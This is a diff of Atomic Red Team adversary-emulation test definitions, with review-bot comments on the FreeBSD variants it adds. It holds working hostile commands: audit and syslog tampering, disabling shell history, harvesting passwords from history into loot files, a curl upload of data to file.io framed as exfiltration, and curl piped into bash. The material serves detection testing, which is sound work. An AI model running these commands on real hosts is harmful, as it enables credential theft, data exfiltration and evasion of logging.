@@ -394094,7 +395436,9 @@ ], "command_list": [ "sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "echo '#art_test_1562_006_1' >> /etc/security/audit_event\n", "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "if [ -f \"/etc/syslog.conf\" ];\nthen echo '#art_test_1562_006_2' >> /etc/syslog.conf\nfi\n", "cmd /c \"\\..\\ExternalPayloads\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"Microsoft-Windows-Powershell\" -ets", "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", 
@@ -394142,6 +395486,27 @@ "elevation_required": true } }, + { + "name": "Auditing Configuration Changes on FreeBSD Host", + "auto_generated_guid": "cedaf7e7-28ee-42ab-ba13-456abd35d1bd", + "description": "Emulates modification of auditd configuration files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "auditd_config_file_name": { + "description": "The name of the auditd configuration file to be changed", + "type": "string", + "default": "audit_event" + } + }, + "executor": { + "command": "echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}\n", + "cleanup_command": "sed -i \"\" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Logging Configuration Changes on Linux Host", "auto_generated_guid": "7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c", @@ -394173,6 +395538,27 @@ "elevation_required": true } }, + { + "name": "Logging Configuration Changes on FreeBSD Host", + "auto_generated_guid": "6b8ca3ab-5980-4321-80c3-bcd77c8daed8", + "description": "Emulates modification of syslog configuration.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "syslog_config_file_name": { + "description": "The name of the syslog configuration file to be changed", + "type": "string", + "default": "syslog.conf" + } + }, + "executor": { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}\nfi\n", + "cleanup_command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i \"\" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}\nfi\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Disable Powershell ETW Provider - Windows", "auto_generated_guid": "6f118276-121d-4c09-bb58-a8fb4a72ee84", 
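Review bot: Both new FreeBSD cleanup commands use BSD sed's `sed -i "" ...`, which GNU sed parses as an empty script followed by a filename, so on the `linux` platform these tests declare the cleanup fails and the appended marker lines stay in `/etc/security/audit_event` and `/etc/syslog.conf`; label the tests freebsd, or use a portable cleanup such as `grep -v '#art_test_1562_006_1' file > file.tmp && mv file.tmp file`. Whether audit_event(5) treats a line beginning with `#` as a comment the way syslog.conf does should be confirmed before this runs on a host with auditing enabled, since a malformed entry there is presumably not harmless if auditd reloads the file. The `auditd_config_file_name` argument is interpolated straight into `/etc/security/#{...}`, so a value containing `../` writes outside that directory; acceptable for an operator-run test, but worth a description sentence.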
@@ -410903,8 +412289,8 @@ "auto_generated_guid": "ffc8b249-372a-4b74-adcd-e4c0430842de", "description": "Find or discover files on the file system\n\nReferences:\n\nhttp://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/\n\nhttps://perishablepress.com/list-files-folders-recursively-terminal/\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { @@ -410924,8 +412310,8 @@ "auto_generated_guid": "13c5e1ae-605b-46c4-a79f-db28c77ff24e", "description": "Find or discover files on the file system\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { @@ -420493,7 +421879,7 @@ } }, { - "name": "System Network Connections Discovery Linux & MacOS", + "name": "System Network Connections Discovery FreeBSD, Linux & MacOS", "auto_generated_guid": "9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2", "description": "Get a listing of network connections.\n\nUpon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.\n", "supported_platforms": [ @@ -432222,6 +433608,7 @@ ], "command_list": [ "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > ~/loot.txt\n", + "cat ~/.history | grep -e '-p ' -e 'pass' -e 'ssh' > ~/loot.txt\n", "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", "cat ~/.bash_history" ], 
@@ -432264,6 +433651,35 @@ "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}\n", "name": "sh" } + }, + { + "name": "Search Through sh History", + "auto_generated_guid": "d87d3b94-05b4-40f2-a80f-99864ffa6803", + "description": "Search through sh history for specifice commands we want to capture\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "~/loot.txt" + }, + "sh_history_grep_args": { + "description": "grep arguments that filter out specific commands we want to capture", + "type": "path", + "default": "-e '-p ' -e 'pass' -e 'ssh'" + }, + "sh_history_filename": { + "description": "Path of the sh history file to capture", + "type": "path", + "default": "~/.history" + } + }, + "executor": { + "command": "cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}\n", + "name": "sh" + } } ] } @@ -435938,8 +437354,8 @@ "auto_generated_guid": "bd4cf0d1-7646-474e-8610-78ccf5a097c4", "description": "Extracting credentials from files\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_path": { @@ -435983,8 +437399,8 @@ "auto_generated_guid": "da4f751a-020b-40d7-b9ff-d433b7799803", "description": "This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_path": { 
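Review bot: In the new "Search Through sh History" test, `sh_history_grep_args` is typed `path` although it holds grep options (`-e '-p ' -e 'pass' -e 'ssh'`); the Linux sibling's argument is outside this hunk so I cannot confirm its type, but `"type": "string"` is what the value is, and the description has a typo, `specifice` → `specific`. The default `~/.history` is, to my knowledge, the csh/tcsh history location, while FreeBSD's sh writes wherever `HISTFILE` points, so the description should name the shell this targets (or the default should derive from `$HISTFILE`). `cat file | grep ...` can be `grep #{sh_history_grep_args} #{sh_history_filename} > #{output_file}`.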
@@ -442737,10 +444153,37 @@ "phase_name": "discovery" } ], - "command_list": [], + "command_list": [ + "powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*SYSTEM*'} | export-csv $env:temp\\T1654_events.txt\"" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1654/T1654.yaml", + "name": "Atomic Red Team Test - Log Enumeration", + "content": { + "attack_technique": "T1654", + "display_name": "Log Enumeration", + "atomic_tests": [ + { + "name": "Get-EventLog To Enumerate Windows Security Log", + "auto_generated_guid": "a9030b20-dd4b-4405-875e-3462c6078fdc", + "description": "Uses the built-in PowerShell commandlet Get-EventLog to search for 'SYSTEM' keyword and saves results to a text file.\n\nThis technique was observed in a [TheDFIRReport case](https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/) \nwhere the threat actor enumerated the Windows Security audit log to determine user accounts and associated IPv4 addresses.\n\nSuccessful execution will save matching log events to the users temp folder.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*SYSTEM*'} | export-csv $env:temp\\T1654_events.txt\"", + "cleanup_command": "powershell -c \"remove-item $env:temp\\T1654_events.txt -ErrorAction Ignore\"", + "name": "powershell", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [], "external_reference": [], "controls": [], @@ -454562,7 +456005,7 @@ } ], "command_list": [ - "C:\\Windows\\System32\\Curl.exe -F 'file=@/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "C:\\Windows\\System32\\Curl.exe -k -F \"file=@/T1048.002/src/artifact\" https://file.io/\n", "curl -F 'file=@/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" ], "commands": [], 
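Review bot: `Get-EventLog` exists only in Windows PowerShell 5.1 and is absent from PowerShell 6+/pwsh, so the new T1654 test fails with "not recognized" when the executor resolves to pwsh; `Get-WinEvent -LogName Security | Where-Object { $_.Message -like '*SYSTEM*' }` works in both and should replace it, or the description should state the 5.1 requirement. `export-csv` writes CSV, yet the output is named `T1654_events.txt`; `T1654_events.csv` matches the content and the description ("saves results to a text file") should follow. Reading the whole Security log with a wildcard match can take minutes on a busy server, so `-Newest` (or `-MaxEvents` with Get-WinEvent) would bound the test's runtime.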
@@ -454610,11 +456053,11 @@ "executor": { "name": "command_prompt", "elevation_required": false, - "command": "#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" + "command": "#{curl_path} -k -F \"file=@#{input_file}\" https://file.io/\n" } }, { - "name": "Exfiltrate data HTTPS using curl linux", + "name": "Exfiltrate data HTTPS using curl freebsd,linux or macos", "auto_generated_guid": "4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01", "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", "supported_platforms": [ @@ -457288,8 +458731,8 @@ "auto_generated_guid": "4ff64f0b-aaf2-4866-b39d-38d9791407cc", "description": "Utilize ps to identify processes.\n\nUpon successful execution, sh will execute ps and output to /tmp/loot.txt.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { 
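Review bot: The Windows curl exfil executor now passes `-k`, which disables TLS certificate verification for an upload to a public host with a valid certificate; nothing in the hunk says why, and it teaches the wrong habit in a command that gets copied into lab runbooks, so drop it or document in the description the TLS-inspection proxy that made it necessary. The same change removes `-F 'maxDownloads=1' -F 'autoDelete=true'`, so unless file.io's defaults still expire the object after one download, the uploaded `#{input_file}` stays retrievable by anyone holding the returned link; the Linux/macOS sibling in the command_list keeps those fields, so the two executors now behave differently. The renamed "Exfiltrate data HTTPS using curl freebsd,linux or macos" description should list the platforms the test actually declares.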
@@ -457791,10 +459234,13 @@ ], "command_list": [ "export HISTCONTROL=ignoreboth\nwhoami\n", + "export HISTSIZE=0\nwhoami\n", "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE; fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n", "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\" ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\"; fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls -la $HISTFILE\"; fi\n", "TEST=$(echo $HISTFILESIZE)\necho $HISTFILESIZE\nexport HISTFILESIZE=0\nif [ $(echo $HISTFILESIZE) -eq 0 ]; then echo \"\\$HISTFILESIZE is zero\"; fi\n# -> $HISTFILESIZE is zero\n", + "echo $HISTSIZE\nexport HISTSIZE=0\nif [ $(echo $HISTSIZE) -eq 0 ]; then echo \"\\$HISTSIZE is zero\"; fi\n# -> $HISTSIZE is zero\n", "TEST=$(echo $HISTFILE)\necho $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", + "echo $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands are not in history\"; fi\n# -> ls commands are not in 
history\nunset HISTIGNORE\n\nif ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo \"History cache is empty\"; fi\n# -> History cache is empty\n" ], "commands": [], @@ -457827,6 +459273,25 @@ "name": "sh" } }, + { + "name": "Disable history collection (freebsd)", + "auto_generated_guid": "cada55b4-8251-4c60-819e-8ec1b33c9306", + "description": "Disables history collection in shells\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "evil_command": { + "description": "Command to run after shell history collection is disabled", + "type": "string", + "default": "whoami" + } + }, + "executor": { + "command": "export HISTSIZE=0\n#{evil_command}\n", + "name": "sh" + } + }, { "name": "Mac HISTCONTROL", "auto_generated_guid": "468566d5-83e5-40c1-b338-511e1659628d", @@ -457882,6 +459347,20 @@ "cleanup_command": "export HISTCONTROL=$(echo $TEST)\n" } }, + { + "name": "Setting the HISTSIZE environment variable", + "auto_generated_guid": "386d3850-2ce7-4508-b56b-c0558922c814", + "description": "An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.\n\nNote: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo $HISTSIZE\nexport HISTSIZE=0\nif [ $(echo $HISTSIZE) -eq 0 ]; then echo \"\\$HISTSIZE is zero\"; fi\n# -> $HISTSIZE is zero\n", + "cleanup_command": "export HISTSIZE=100\n" + } + }, { "name": "Setting the HISTFILE environment variable", "auto_generated_guid": "b3dacb6c-a9e3-44ec-bf87-38db60c5cad1", 
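Review bot: `Disable history collection (freebsd)` declares `"supported_platforms": ["linux"]` although its name targets FreeBSD, and the same mismatch is in every FreeBSD-named test this commit adds (`Setting the HISTSIZE environment variable` in the next hunk, `Setting the HISTFILE environment variable (freebsd)`, `Tor Proxy Usage - FreeBSD`, the `(freebsd)` T1059.004 tests, `Disable syslog (freebsd)`, `SSH Credential Stuffing From FreeBSD`, `Examine password complexity policy - FreeBSD`, `Add command to .shrc`, `Install root CA on FreeBSD`, `Security Software Discovery - pgrep (FreeBSD)`). Most of them invoke FreeBSD-only tooling (`sysrc`, `pkg`, `pw`, `b64encode`, `certctl`), so a runner that selects tests by platform will execute them on Linux hosts where they fail or, worse, leave half-applied changes behind for the cleanup to miss. If the schema has a `freebsd` platform value it should be used here; otherwise the `uname` guard the T1027 test in this commit uses (`if [ \"$(uname)\" = 'FreeBSD' ]`) would at least make these tests skip cleanly.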
@@ -457896,6 +459375,20 @@ "cleanup_command": "export HISTFILE=$(echo $TEST)\n" } }, + { + "name": "Setting the HISTFILE environment variable (freebsd)", + "auto_generated_guid": "f7308845-6da8-468e-99f2-4271f2f5bb67", + "description": "An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.\n\nNote: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", + "cleanup_command": "export HISTFILE=~/.sh_history\n" + } + }, { "name": "Setting the HISTIGNORE environment variable", "auto_generated_guid": "f12acddb-7502-4ce6-a146-5b62c59592f1", @@ -484731,8 +486224,8 @@ "auto_generated_guid": "952931a4-af0b-4335-bbbe-73c8c5b327ae", "description": "Permission Groups Discovery\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", 
@@ -504234,7 +505727,8 @@ "& \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\"\n", "invoke-expression 'cmd /c start powershell -Command {cmd /c \"\\..\\ExternalPayloads\\tor\\Tor\\tor.exe\"}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", "sudo systemctl start tor \n", - "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n" + "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "sysrc tor_enable=\"YES\"\nservice tor start\n" ], "commands": [], "queries": [], @@ -504323,7 +505817,8 @@ "executor": { "command": "sudo systemctl start tor \n", "cleanup_command": "sudo systemctl stop tor\n", - "name": "sh" + "name": "sh", + "elevation_required": true } }, { @@ -504346,6 +505841,28 @@ "cleanup_command": "killall tor > /dev/null 2>&1\n", "name": "sh" } + }, + { + "name": "Tor Proxy Usage - FreeBSD", + "auto_generated_guid": "550ec67d-a99e-408b-816a-689271b27d2a", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y tor\n" + } + ], + "executor": { + "command": "sysrc tor_enable=\"YES\"\nservice tor start\n", + "cleanup_command": "service tor stop\nsysrc -x tor_enable\n", + "name": "sh", + "elevation_required": true + } } ] } 
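Review bot: The prerequisite check in `Tor Proxy Usage - FreeBSD`, `if [ -x \"$(command -v tor --version)\" ]`, passes a stray `--version` to `command -v`, which depending on the shell either fails or prints a second line, so `-x` is applied to something other than the tor path; `if [ -x \"$(command -v tor)\" ]; then exit 0; else exit 1; fi` is the form the sibling tests use. `sysrc tor_enable=\"YES\"` is also a persistent rc.conf change: if the executor is interrupted before `cleanup_command` runs, tor starts at every boot, which the description should state so operators know to check rc.conf afterwards.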
@@ -510277,8 +511794,12 @@ "cat /etc/shells \n", "for i in $(seq 1 5); do echo \"$i, Atomic Red Team was here!\"; sleep 1; done\n", "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n", + "ART=$(echo -n \"id\" |b64encode -r -)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |b64decode -r |/bin/sh\nunset ART\n", "useradd -s /bin/bash art\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", + "pw useradd art -g wheel -s /bin/csh\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/bash\n", + "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/sh\n", + "cd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh\nls -la /tmp/art.txt\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash\nls -la /tmp/art.txt \n", "cd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh\nls -la /tmp/art.txt\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash\nls -la /tmp/art.txt \n", "uname -srm\n", "nohup ./sandcat.go -server #{server} &\n", @@ -510297,10 +511818,10 @@ { "name": "Create and Execute Bash Shell Script", "auto_generated_guid": "7e7ac3ed-f795-4fa5-b711-09d6fbe9b873", - "description": "Creates and executes a simple bash script.\n", + "description": "Creates and executes a simple sh script.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "script_path": { 
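Review bot: The added `cd /tmp\ncurl -s https://raw.githubusercontent.com/.../pipe-to-shell.sh |bash` entry is byte-for-byte identical to the entry on the line below it, because the FreeBSD pipe-to-shell test in the `@@ -510524` hunk keeps the same default URL and still pipes the download into `bash` while its executor is `sh`. As far as I recall bash is a port rather than part of the FreeBSD base system, so that test fails on a stock install, and the duplicate entry here hides that it was never really adapted. Piping into `sh` in that test (`curl -s #{remote_url} |sh`) fixes both, since the command_list entry then becomes a distinct FreeBSD command.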
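Review bot: The description now reads `Creates and executes a simple sh script.` but the test name two lines above it is still `Create and Execute Bash Shell Script`, so the two disagree about which shell the test exercises; the input_arguments and executor that would settle it lie outside the hunk. Either rename the test to `Create and Execute Shell Script` or keep `bash` in the description.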
@@ -510320,8 +511841,8 @@ "auto_generated_guid": "d0c88567-803d-4dca-99b4-7ce65e7b257c", "description": "Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.\n\nUpon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", @@ -510460,6 +511981,19 @@ "command": "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n" } }, + { + "name": "Obfuscated command line scripts (freebsd)", + "auto_generated_guid": "5dc1d9dd-f396-4420-b985-32b1c4f79062", + "description": "An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "ART=$(echo -n \"id\" |b64encode -r -)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |b64decode -r |/bin/sh\nunset ART\n" + } + }, { "name": "Change login shell", "auto_generated_guid": "c7ac59cb-13cc-4622-81dc-6d2fee9bfac7", 
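Review bot: The description of `Obfuscated command line scripts (freebsd)` says the decoded string is piped `as a command to bash`, but the command pipes it into `/bin/sh` and the executor is `sh`, so the text documents a different shell than the one that runs. `then pipes it as a command to sh, which results in the id command being executed.` matches the code.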
@@ -510481,6 +512015,27 @@ "cleanup_command": "userdel art\n" } }, + { + "name": "Change login shell (freebsd)", + "auto_generated_guid": "33b68b9b-4988-4caf-9600-31b7bf04227c", + "description": "An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. \n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "chsh - change login shell, must be installed\n", + "prereq_command": "if [ -f /usr/bin/chsh ]; then echo \"exit 0\"; else echo \"exit 1\"; exit 1; fi\n", + "get_prereq_command": "echo \"Automated installer not implemented yet, please install chsh manually\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "pw useradd art -g wheel -s /bin/csh\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", + "cleanup_command": "rmuser -y art\n" + } + }, { "name": "Environment variable scripts", "auto_generated_guid": "bdaebd56-368b-4970-a523-f905ff4a8a51", @@ -510495,6 +512050,20 @@ "cleanup_command": "unset ART\n" } }, + { + "name": "Environment variable scripts (freebsd)", + "auto_generated_guid": "663b205d-2121-48a3-a6f9-8c9d4d87dfee", + "description": "An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/sh\n", + "cleanup_command": "unset ART\n" + } + }, { "name": "Detecting pipe-to-shell", "auto_generated_guid": "fca246a8-a585-4f28-a2df-6495973976a1", 
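Review bot: `Change login shell (freebsd)` creates the test user with `pw useradd art -g wheel -s /bin/csh`, while its description says the user is created with a `/bin/sh` shell and then changed to sh, so text and command disagree; `creates an art user with a /bin/csh shell, changes the user's shell to /bin/sh, then deletes the art user.` is what actually happens. Placing the throwaway account in `wheel` also makes it eligible for `su`, which the test does not need; unless `pw` requires an explicit group here (it creates a per-user group by default, as far as I recall), dropping `-g wheel` keeps the fixture least-privilege. The prerequisite's `echo \"exit 0\"` only prints the words, which is harmless since the script falls through with status 0, but `exit 0` would say what it means.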
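Review bot: The description of `Environment variable scripts (freebsd)` says the test runs `in a bash shell`, but the executor is `sh` and the variable is piped to `/bin/sh`. `The following test, in a sh shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh` matches the command.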
@@ -510524,6 +512093,35 @@ "cleanup_command": "rm /tmp/art.txt\n" } }, + { + "name": "Detecting pipe-to-shell (freebsd)", + "auto_generated_guid": "1a06b1ec-0cca-49db-a222-3ebb6ef25632", + "description": "An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_url": { + "description": "url of remote payload", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Debian based machine.\n", + "prereq_command": "if grep -iq \"FreeBSD\" /etc/os-release; then echo \"FreeBSD\"; else echo \"NOT FreeBSD\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\n", + "get_prereq_command": "pkg update && pkg install -y curl\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt \n", + "cleanup_command": "rm /tmp/art.txt \n" + } + }, { "name": "Current kernel information enumeration", "auto_generated_guid": "3a53734a-9e26-4f4b-ad15-059e767f5f14", 
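Review bot: The dependency description `Check if running on a Debian based machine.` is a copy-paste leftover; the prereq_command greps `/etc/os-release` for `FreeBSD` and checks for curl, so it should read `Check if running on FreeBSD and that curl is installed.` The `/etc/os-release` probe also relies on a file that, as far as I recall, only newer FreeBSD releases ship, whereas `[ \"$(uname)\" = 'FreeBSD' ]`, which the T1027 test in this same commit uses, works on all of them. The executor command still pipes into `bash` although the executor is `sh`; the duplicated command_list entry in the `@@ -510277` hunk shows the same thing.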
